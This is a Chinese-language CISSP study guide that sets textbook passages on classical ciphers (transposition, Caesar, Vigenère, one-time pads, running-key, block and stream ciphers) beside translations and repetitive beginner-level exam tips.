机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
学习单元 16 / PDF P387

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Transposition Ciphers Transposition ciphers use an encryption algorithm to rearrange the letters of a plaintext message, forming the ciphertext message. The decryption algorithm simply reverses the encryption transformation to retrieve the original message. In the challenge-response protocol example in Figure 6.1 earlier in this chapter, a simple transposition cipher was used to reverse the letters of the message so that apple became elppa. Transposition ciphers can be much more complicated than this. For example, you can use a keyword to perform a columnar transposition.

In the following example, we're attempting to encrypt the message “The fighters will strike the enemy bases at noon” using the secret key attacker. Our first step is to take the letters of the keyword and number them in alphabetical order. The first appearance of the letter A receives the value 1; the second appearance is numbered 2. The next letter in sequence, C, is numbered 3, and so on.

This results in the following sequence: A T T A C K E R 1 7 8 2 3 5 4 6 Next, the letters of the message are written in order underneath the letters of the keyword: A T T A C K E R 1 7 8 2 3 5 4 6 T H E F I G H T E R S W I L L S T R I K E T H E E N E M Y B A S E S A T N O O N Finally, the sender enciphers the message by reading down each column; the order in which the columns are read corresponds to the numbers assigned in the first step.

This produces the following ciphertext: T E T E E F W K M T I I E Y N H L H A O G L T B O T S E S N H R R N S E S I E A On the other end, the recipient reconstructs the eight-column matrix using the ciphertext and the same keyword and then simply reads the plaintext message across the rows. Substitution Ciphers

中文直译 / 整理

置换密码 置换密码使用加密算法重新排列明文消息中的字母,形成密文消息。 解密算法 只需反转加密变换即可恢复原始消息。 在本章前面的挑战‑响应协议示例中图6.1,使用了一种简单的置换密码来反转消 息中的字母,使得apple变为elppa。 置换密码可以比这复杂得多。 例如,你可 以使用一个关键词来执行列置换。 在以下示例中,我们尝试使用秘密密钥 attacker加密消息“the fighters will strike the enemy bases at noon”。 我 们的第一步是取关键词的字母,并按字母顺序编号。 字母A的首次出现被赋予值 1; 第二次出现编号为2。 接下来的字母C编号为3,依此类推。 这得到以下序列: A T T A C K E R 1 7 8 2 3 5 4 6 接下来,将消息的字母按顺序写在关键词字母的下方: A T T A C K E R 1 7 8 2 3 5 4 6 T H E F I G H T E R S W I L L S T R I K E T H E E N E M Y B A S E S A T N O O N 最后,发送方通过逐列读取来加密消息;

读取列的顺序对应于第一步中分配的 数字。 这生成以下密文: T E T E E F W K M T I I E Y N H L H A O G L T B O T S E S N H R R N S E S I E A 在另一端,接收方使用密文和相同的关键词重建八列矩阵,然后逐行读取明 文信息。 替换密码

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 17 / PDF P388

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Substitution ciphers use the encryption algorithm to replace each character or bit of the plaintext message with a different character. One of the earliest known substitution ciphers was used by Julius Caesar to communicate with Cicero in Rome while he was conquering Europe. Caesar knew that there were several risks when sending messages—one of the messengers might be an enemy spy or might be ambushed while en route to the deployed forces. For that reason, Caesar developed a cryptographic system now known as the Caesar cipher. The system is extremely simple. To encrypt a message, you simply shift each letter of the alphabet three places to the right.

For example, A would become D, and B would become E. If you reach the end of the alphabet during this process, you simply wrap around to the beginning so that X becomes A, Y becomes B, and Z becomes C. For this reason, the Caesar cipher also became known as the ROT3 (or Rotate 3) cipher. The Caesar cipher is a substitution cipher that is mono-alphabetic. Although the Caesar cipher uses a shift of 3, the more general shift cipher uses the same algorithm to shift any number of characters desired by the user. For example, the ROT12 cipher would turn an A into an M, a B into an N, and so on. Here's an example of the Caesar cipher in action.

The first line contains the original sentence, and the second line shows what the sentence looks like when it is encrypted using the Caesar cipher. THE DIE HAS BEEN CAST WKH GLH KDV EHHQ FDVW To decrypt the message, you simply shift each letter three places to the left.

中文直译 / 整理

替换密码使用加密算法将明文消息中的每个字符或比特替换为另一个字符。 已知最早的替换密码之一是由尤利乌斯·凯撒在征服欧洲期间用于与西塞罗在罗 马通信的。 凯撒知道发送消息时存在多种风险——其中一名信使可能是敌方间谍, 或在前往部署部队的途中遭遇伏击。 因此,凯撒开发了一种如今被称为凯撒密 码的加密系统。 该系统极其简单:要加密一条消息,只需将字母表中的每个字 母向右移动三位。 例如,A会变为D,B会变为E。 如果在此过程中到达字母表末 尾,只需循环回到开头,因此X变为A,Y变为B,Z变为C。 正因为如此,凯撒密 码也被称为ROT3(或旋转3)密码。 凯撒密码是一种单字母替换密码。 尽管凯撒密码使用的是移位3,但更通用的移位密码使用相同的算法来 实现用户所需的任意字符移位。 例如,ROT12密码会将A变为M,将B变为 N,以此类推。 以下是凯撒密码的实际示例。 第一行包含原始句子,第二行显示使用凯撒密 码加密后该句子的形式。 骰子已经掷出 要解密消息,您只需将每个字母向左移动三位。

小白解释

场景先行:你是公司的安全负责人,正在读第 388 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 18 / PDF P389

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Although the Caesar cipher is easy to use, it's also easy to crack. It's vulnerable to a type of attack known as frequency analysis. The most common letters in the English language are E, T, A, O, I, N, S, H, R, D, L, and U. This is also known as “ETAOIN SHRDLU.” An attacker seeking to break a Caesar-style cipher encoding message that was written in English merely needs to find the most common letters in the encrypted text and experiment with substitutions of these common letters to help determine the pattern. You can express the ROT3 cipher in mathematical terms by converting each letter to its decimal equivalent (where A is 0 and Z is 25).

You can then add three to each plaintext letter (P) to determine the ciphertext (C). You account for the wrap-around by using the modulo function discussed in the section “Cryptographic Mathematics,” earlier in this chapter. The final encryption function for the Caesar cipher is then this: C = (P + 3) mod 26 The corresponding decryption function is as follows: P = (C - 3) mod 26 As with transposition ciphers, there are many substitution ciphers that are more sophisticated than the examples provided in this chapter. Polyalphabetic substitution ciphers use multiple alphabets (such as a keyword) in the same message to hinder decryption efforts.

One of the most notable examples of a polyalphabetic substitution cipher system is the Vigenère cipher.

The Vigenère cipher uses a single encryption/decryption chart, as shown here: |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z A|A B C D E F G H I J K L M N O P Q R S T U V W X Y Z B|B C D E F G H I J K L M N O P Q R S T U V W X Y Z A C|C D E F G H I J K L M N O P Q R S T U V W X Y Z A B D|D E F G H I J K L M N O P Q R S T U V W X Y Z A B C E|E F G H I J K L M N O P Q R S T U V W X Y Z A B C D F|F G H I J K L M N O P Q R S T U V W X Y Z A B C D E G|G H I J K L M N O P Q R S T U V W X Y Z A B C D E F H|H I J K L M N O P Q R S T U V W X Y Z A B C D E F G I|I J K L M N O P Q R S T U V W X Y Z A B C D E F G H J|J K L M N O P Q R S T U V W X Y Z A B C D E F G H I

中文直译 / 整理

尽管凯撒密码易于使用,但也容易被破解。 它容易受到一种称为频率分 析的攻击。 英语中最常见的字母是E、T、A、O、I、N、S、H, R, D, L, and U。 这也被称作“ETAOIN SHRDLU”。 试图破解用英语编写并采用凯 撒密码加密的消息的攻击者,只需找出密文中出现最频繁的字母,并尝试用 这些常见字母进行替换,以帮助确定加密模式。 您可以将ROT3密码用数学方式表达为:将每个字母转换为其十进制等价值 (其中A为0,Z为25)。 然后,您可以将每个明文字母(P)加三,以确定密 文(C)。 您通过使用本章前面“密码数学”部分讨论的模运算函数来处理循 环回绕。 因此,凯撒密码的最终加密函数如下: C = (P + 3) mod 26 对应的解密函数如下: P = (C ‑ 3) mod 26 与置换密码一样,有许多替代密码比本章提供的示例更为复杂。 多字母替代密码在同一消息中使用多个字母表(例如关键词)来阻碍解密工作。 多字母替代密码系统中最著名的例子之一是维吉尼亚密码。

维吉尼亚密码使用 单一的加密/解密表格,如下所示: |A B C D E F G H I J K L M N O P Q R S T U V W X Y ZA|A B C D E F G H I J K L M N O P Q R S T U V W X Y ZB|B C D E F G H I J K L M N O P Q R S T U V W X Y Z AC|C D E F G H I J K L M N O P Q R S T U V W X Y Z A BD|D E F G H I J K L M N O P Q R S T U V W X Y Z A B CE|E F G H I J K L M N O P Q R S T U V W X Y Z A B C DF|F G H I J K L M N O P Q R S T U V W X Y Z A B C D EG|G H I J K L M N O P Q R S T U V W X Y Z A B C D E FH|H I J K L M N O P Q R S T U V W X Y Z A B C D E F GI|I J K L M N O P Q R S T U V W X Y Z A B C D E F G HJ|J K L M N O P Q R S T U V W X Y Z A B C D E F G H I

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 19 / PDF P390

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

K|K L M N O P Q R S T U V W X Y Z A B C D E F G H I J L|L M N O P Q R S T U V W X Y Z A B C D E F G H I J K M|M N O P Q R S T U V W X Y Z A B C D E F G H I J K L N|N O P Q R S T U V W X Y Z A B C D E F G H I J K L M O}O P Q R S T U V W X Y Z A B C D E F G H I J K L M N P|P Q R S T U V W X Y Z A B C D E F G H I J K L M N O Q|Q R S T U V W X Y Z A B C D E F G H I J K L M N O P R|R S T U V W X Y Z A B C D E F G H I J K L M N O P Q S|S T U V W X Y Z A B C D E F G H I J K L M N O P Q R T|T U V W X Y Z A B C D E F G H I J K L M N O P Q R S U|U V W X Y Z A B C D E F G H I J K L M N O P Q R S T V|V W X Y Z A B C D E F G H I J K L M N O P Q R S T U W|W X Y Z A B C D E F G H I J K L M N O P Q R S T U V X|X Y Z A B C D E F G H I J K L M N O P Q R S T U V W Y|Y Z A B C D E F G H I J K L M N O P Q R S T U V W X Z|Z A B C D E F G H I J K L M N O P Q R S T U V W X Y Notice that the chart is simply the alphabet written repeatedly (26 times) under the master heading, shifting by one letter each time.

You need a key to use the Vigenère system. For example, the plaintext could be LAUNCHNOW and the key could be MILES. Then, you would perform the following encryption process: 1. Write out the plaintext. 2. Underneath, write out the encryption key, repeating the key as many times as needed to establish a line of text that is the same length as the plaintext. 3. Convert each letter position from plaintext to ciphertext. a. Locate the column headed by the first plaintext character (L). b. Next, locate the row headed by the first character of the key (M). c. Finally, locate where these two items intersect, and write down the letter that appears there (X).

This is the ciphertext for that letter position. 4. Repeat steps 1 through 3 for each letter in the plaintext version. The results are shown in Table 6.5.

K|K L M N O P Q R S T U V W X Y Z A B C D E F G H I JL|L M N O P Q R S T U V W X Y Z A B C D E F G H I J KM|M N O P Q R S T U V W X Y Z A B C D E F G H I J K LN|N O P Q R S T U V W X Y Z A B C D E F G H I J K L MO}O P Q R S T U V W X Y Z A B C D E F G H I J K L M NP|P Q R S T U V W X Y Z A B C D E F G H I J K L M N OQ|Q R S T U V W X Y Z A B C D E F G H I J K L M N O PR|R S T U V W X Y Z A B C D E F G H I J K L M N O P QS|S T U V W X Y Z A B C D E F G H I J K L M N O P Q RT|T U V W X Y Z A B C D E F G H I J K L M N O P Q R SU|U V W X Y Z A B C D E F G H I J K L M N O P Q R S TV|V W X Y Z A B C D E F G H I J K L M N O P Q R S T UW|W X Y Z A B C D E F G H I J K L M N O P Q R S T U VX|X Y Z A B C D E F G H I J K L M N O P Q R S T U V WY|Y Z A B C D E F G H I J K L M N O P Q R S T U V W XZ|Z A B C D E F G H I J K L M N O P Q R S T U V W X Y

中文直译 / 整理

请注意,该图表只是将字母表重复书写(26次)在主标题下,每次向后移动一 个字母。 使用维吉尼亚密码系统需要一个密钥。 例如,明文可以是 LAUNCHNOW,密钥可以是 MILES。 然后,您将执行以下加密过程: 1. 写出明文。 2. 在其下方写出加密密钥,重复密钥足够多次,以形成与明文长度相同的 文本行。 3. 将明文中的每个字母位置转换为密文。 a. 找到以第一个明文字符(L)为标题的列。 b. 接着,找到以密钥的第一个字符(M)为标题的行。 c. 最后,找到这两者的交叉点,并写下该位置出现的字母(X)。 这 就是该字母位置的密文。 4. 对明文中的每个字母重复步骤1至3。 结果如表6.5所示。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 20 / PDF P391

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

TABLE 6.5 Using the Vigenère system Stage of the processLetters Plaintext L A U N C H N O W Key M I L E S M I L E Ciphertext X I F R U T V Z A Although polyalphabetic substitution protects against direct frequency analysis, it is vulnerable to a second-order form of frequency analysis called period analysis, which is an examination of frequency based on the repeated use of the key. One-Time Pads A one-time pad is an extremely powerful type of substitution cipher. Onetime pads use a different substitution alphabet for each letter of the plaintext message.

They can be represented by the following encryption function, where K is the encryption key used to encrypt the plaintext letter P into the ciphertext letter C: C = P ⊕ K P = C ⊕ K Usually, one-time pads are written as a very long series of numbers to be plugged into the function. One-time pads are also known as Vernam ciphers, after the name of their inventor, Gilbert Sandford Vernam of AT&T Bell Labs. The great advantage of one-time pads is that, when used properly, they are an unbreakable encryption scheme. There is no repeating pattern of alphabetic substitution, rendering cryptanalytic efforts useless.

However, several requirements must be met to ensure the integrity of the algorithm: The one-time pad encryption key must be randomly generated. Using a phrase or a passage from a book would introduce the possibility that cryptanalysts could break the code.

中文直译 / 整理

表 6.5 使用维吉尼亚系统 过程阶段 字母 明文 L A U N C H N O W Key M I L E S M I L E 密文 X I F R U T V Z A 尽管多字母替换可以抵御直接的频率分析,但它容易受到一种称为 周期分析 的二级频率分析的攻击,这种分析基于密钥的重复使用进行频率考察。 一次性密码本 一次性密码本是一种极为强大的替代密码。 一次性密码本为明文消息中的每个 字母使用不同的替代字母表。 它们可以用以下加密函数表示,其中K是用于将 明文字母P加密为密文字母C的加密密钥: C = P ⊕ K P = C ⊕ K 通常,一次性密码本以一长串数字的形式书写,用于代入该函数。 一次性密码本也被称为Vernam密码,以AT&T贝尔实验室的发明者吉尔伯特· 桑福德·弗纳姆的名字命名。 一次性密码本的巨大优势在于,当正确使用时,它们是一种无法破解的加密方 案。 没有重复的字母替换模式,使得密码分析努力毫无用处。 然而,为确保算 法的完整性,必须满足若干要求: 一次性密码本的加密密钥必须随机生成。 使用一句话或一本书中的段落 会增加密码分析者破解该密码的可能性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
学习单元 21 / PDF P392

第 392 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The one-time pad must be physically protected against disclosure. If the enemy has a copy of the pad, they can easily decrypt the enciphered messages. You may be thinking at this point that the Caesar cipher, Vigenère cipher, and one-time pad sound very similar. They are! The difference is the key length. The Caesar shift cipher uses a key of length one, the Vigenère cipher uses a longer key (usually a word or sentence), and the one-time pad uses a key that is as long as the message itself. Each one-time pad must be used only once. If pads are reused, cryptanalysts can compare similarities in multiple messages encrypted with the same pad and possibly determine the key plaintext values used.

In fact, a common practice when using paper pads is to destroy the page of keying material after it is used to prevent reuse. The key must be at least as long as the message to be encrypted. This is because each character of the key is used to encode only one character of the message. These one-time pad security requirements are essential knowledge for any network security professional. All too often, people attempt to implement a one-time pad cryptosystem but fail to meet one or more of these fundamental requirements. Read on for an example of how an entire Soviet code system was broken because of carelessness in this area.

If any one of these requirements is not met, the impenetrable nature of the one-time pad instantly breaks down. In fact, one of the major intelligence successes of the United States resulted when cryptanalysts broke a top-secret Soviet cryptosystem that relied on the use of one-time pads. In this project, code-named VENONA, a pattern in the way the Soviets generated the key values used in their pads was discovered. The existence of this pattern violated the first requirement of a one-time pad cryptosystem: the keys must

中文直译 / 整理

一次性密码本必须物理保护,防止泄露。 如果敌人拥有了密码本的副本, 他们就可以轻松解密加密的消息。 此时你可能会认为凯撒密码、维吉尼亚密码和一次性密码本听起来 非常相似。 它们确实如此! 区别在于密钥长度。 凯撒移位密码使用长度 为一的密钥,维吉尼亚密码使用较长的密钥(通常是一个单词或句子), 而一次性密码本使用的密钥长度与消息本身相同。 每个一次性密码本只能使用一次。 如果重复使用密码本,密码分析人员可 以通过比较使用相同密码本加密的多个消息中的相似性,可能推断出所使 用的密钥明文值。 事实上,使用纸质密码本时的常见做法是在使用后销毁 该页密钥材料,以防止重复使用。 密钥的长度必须至少与待加密的消息一样长。 这是因为密钥的每个字符仅 用于编码消息中的一个字符。 这些一次性密码本的安全要求是任何网络安全部门专业人员必须掌握 的基本知识。 人们常常试图实现一次性密码本加密系统,但却未能满足其 中一项或多项基本要求。 请继续阅读,了解整个苏联密码系统如何因这一 领域的疏忽而被破解的示例。 如果这些要求中的任何一项未得到满足,一次性密码本的不可破解性将立即崩 溃。

事实上,美国最重大的情报成就之一,就是密码分析人员破解了一种依赖 一次性密码本的苏联最高机密密码系统。 在代号为VENONA的该项目中,研究 人员发现了苏联在生成其密码本密钥时所使用的模式。 这一模式的存在违反了 一次性密码本密码系统的第一项要求:密钥必须

小白解释

场景先行:你是公司的安全负责人,正在读第 392 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 392 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 22 / PDF P393

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

be randomly generated without the use of any recurring pattern. The entire VENONA project was recently declassified and is publicly available on the National Security Agency website. One-time pads have been used throughout history to protect extremely sensitive communications. The major obstacle to their widespread use is the difficulty of generating, distributing, and safeguarding the lengthy keys required. One-time pads can realistically be used only for short messages, because of key lengths. If you're interested in learning more about one-time pads, there is a great description with photos and examples at www.cryptomuseum.com/crypto/otp/index.htm.

Running Key Ciphers Many cryptographic vulnerabilities surround the limited length of the cryptographic key. As you learned in the previous section, one-time pads avoid these vulnerabilities by using a key that is at least as long as the message. However, one-time pads are awkward to implement because they require the physical exchange of pads. One common solution to this dilemma is the use of a running key cipher (also known as a book cipher). In this cipher, the encryption key is as long as the message itself and is often chosen from a common book, newspaper, or magazine.

For example, the sender and recipient might agree in advance to use the text of a chapter from Moby Dick, beginning with the third paragraph, as the key. They would both simply use as many consecutive characters as necessary to perform the encryption and decryption operations. Let's look at an example. Suppose you wanted to encrypt the message “Richard will deliver the secret package to Matthew at the bus station tomorrow” using the key just described. This message is 66 characters in length, so you'd use the first 66 characters of the running key: “With much interest I sat watching him.

Savage though he was, and hideously marred.” Any algorithm could then be used to encrypt the plaintext message using this key. Let's look at the example of modulo 26 addition, which converts each letter to a decimal equivalent, adds the plaintext to the key, and then performs a modulo 26 operation to yield the ciphertext. If you assign the

中文直译 / 整理

随机生成,且不能使用任何重复模式。 整个VENONA项目最近已解密,并可 在国家安全局网站上公开获取。 一次性密码本在历史上一直被用于保护极其敏感的通信。 其广泛使用的最大障 碍在于生成、分发和保护所需长密钥的困难。 由于密钥长度的原因,一次性密 码本实际上仅能用于短消息。 如果您想了解更多关于一次性密码本的信息, 可以在以下网址找到包含图片和示例的精彩介绍: www.cryptomuseum.com/crypto/otp/index.htm. 运行密钥密码 许多密码学漏洞都源于加密密钥长度的限制。 正如您在上一节所学,一次性 密码本通过使用至少与消息等长的密钥来避免这些漏洞。 然而,一次性密码 本难以实现,因为它们需要物理交换密码本。 解决这一困境的常见方法是使用运行密钥密码(也称为书籍密码)。 在这种密 码中,加密密钥的长度与消息本身相同,通常从一本常见的书籍、报纸或杂志 中选取。 例如,发送方和接收方可以提前约定使用《白鲸》一书的某一章文本, 从第三段开始作为密钥。 他们只需按需使用连续的字符即可完成加密和解密操 作。 让我们看一个例子。

假设你希望使用刚刚描述的密钥加密消息“ Richard will deliver the secret package to Matthew at the bus station tomorrow”。 这条消息长度为66个字符,因此你需要使用运行密钥的前66个 字符:“With much interest I sat watching him. Savage though he was, and hideously marred.” 然后可以使用任何算法利用此密钥加密明文 消息。 让我们以模26加法为例,该方法将每个字母转换为十进制等价值,将明 文与密钥相加,然后执行模26运算以生成密文。 如果你将

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 23 / PDF P394

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

letter A the value 0 and the letter Z the value 25, Table 6.6 shows the encryption operation for the first two words of the ciphertext. C = (P + K) mod 26 P = (C - K) mod 26 TABLE 6.6 The encryption operation Operation component x x x x x x xx x x x Plaintext R I C H A R DW I L L Key W I T H M U CH I N T Numeric plaintext 178 2 7 0 173228 1111 Numeric key 228 197 122027 8 1319 Numeric ciphertext 13162114121153 16244 Ciphertext N Q V O M L FD Q Y E When the recipient receives the ciphertext, they use the same key and then subtract the key from the ciphertext, perform a modulo 26 operation, and then convert the resulting plaintext back to alphabetic characters.

Block Ciphers Block ciphers operate on “chunks,” or blocks, of a message and apply the encryption algorithm to an entire message block at the same time. The transposition ciphers are examples of block ciphers. The simple algorithm used in the challenge-response algorithm takes an entire word and reverses its letters. The more complicated columnar transposition cipher works on an entire message (or a piece of a message) and encrypts it using the transposition algorithm and a secret keyword. Most modern encryption algorithms implement some type of block cipher. Stream Ciphers Stream ciphers operate on one character or bit of a message (or data stream) at a time.

The Caesar cipher is an example of a stream cipher. The one-time pad is also a stream cipher because the algorithm operates on each letter of the plaintext message independently. Stream ciphers can also function as a type of block cipher. In such operations there is a buffer that fills up to realtime data that is then encrypted as a block and transmitted to the recipient. Confusion and Diffusion

中文直译 / 整理

